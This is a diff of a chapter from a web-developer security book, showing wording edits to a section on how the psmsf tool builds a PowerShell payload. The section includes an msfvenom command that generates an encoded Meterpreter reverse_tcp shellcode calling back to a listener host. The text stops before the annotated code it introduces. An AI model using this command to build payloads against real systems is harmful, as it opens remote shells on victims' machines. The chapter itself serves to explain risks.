holisticinfosec/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter7.md

 ##### PowerShell Payload creation details {#vps-identify-risks-powershell-exploitation-via-executable-psmsf-powershell-payload-creation-details}

-When `psmsf` is run as per above, the Metasploit `windows/meterpreter/reverse_tcp` shellcode is generated by running `msfvenom` programmatically as the following:
+When `psmsf` is run as per above, the Metasploit `windows/meterpreter/reverse_tcp` shellcode is generated by running `msfvenom` programmatically as follows:

 {linenos=off, lang=bash}
     msfvenom --payload windows/meterpreter/reverse_tcp LHOST=<listener-ip> LPORT=4444 StagerURILength=5 StagerVerifySSLCert=false --encoder x86/shikata_ga_nai --arch x86 --platform windows --smallest --format c
     # msfvenom --help-formats # Lists all the formats available with description.
     # msfvenom --list encoders # Lists all the encoders available with description.

-`psmsf` then takes the generated output and in a function called [`extract_msf_shellcode`](https://github.com/nixawk/psmsf/blob/2e599d5a757ea1540794b46a25825e5317b66fc6/psmsf#L47) strips out the characters that do not actually form part of the raw shellcode, like an assignment to a char array, double quotes, new lines, semicolons, white space, etc, and just leaves the raw shellcode.
+`psmsf` then takes the generated output and in a function called [`extract_msf_shellcode`](https://github.com/nixawk/psmsf/blob/2e599d5a757ea1540794b46a25825e5317b66fc6/psmsf#L47) strips out the characters that do not actually form part of the raw shellcode, such as an assignment to a char array, double quotes, new lines, semicolons, white space, etc, and just leaves the raw shellcode.

 `psmsf` then replaces any instances of `\x` with `0x`.

 `psmsf` then passes the cleaned up `reverse_tcp` shellcode to a function called [`generate_powershell_script`](https://github.com/nixawk/psmsf/blob/2e599d5a757ea1540794b46a25825e5317b66fc6/psmsf#L83-L103) that embeds it into a PowerShell script that is going to become the main part of our payload.

-That code looks like the following, I have added the annotations to help you understand how it works:
+That code appears as follows, I have added the annotations to help you understand how it works:

 {title="psmsf", linenos=off, lang=python}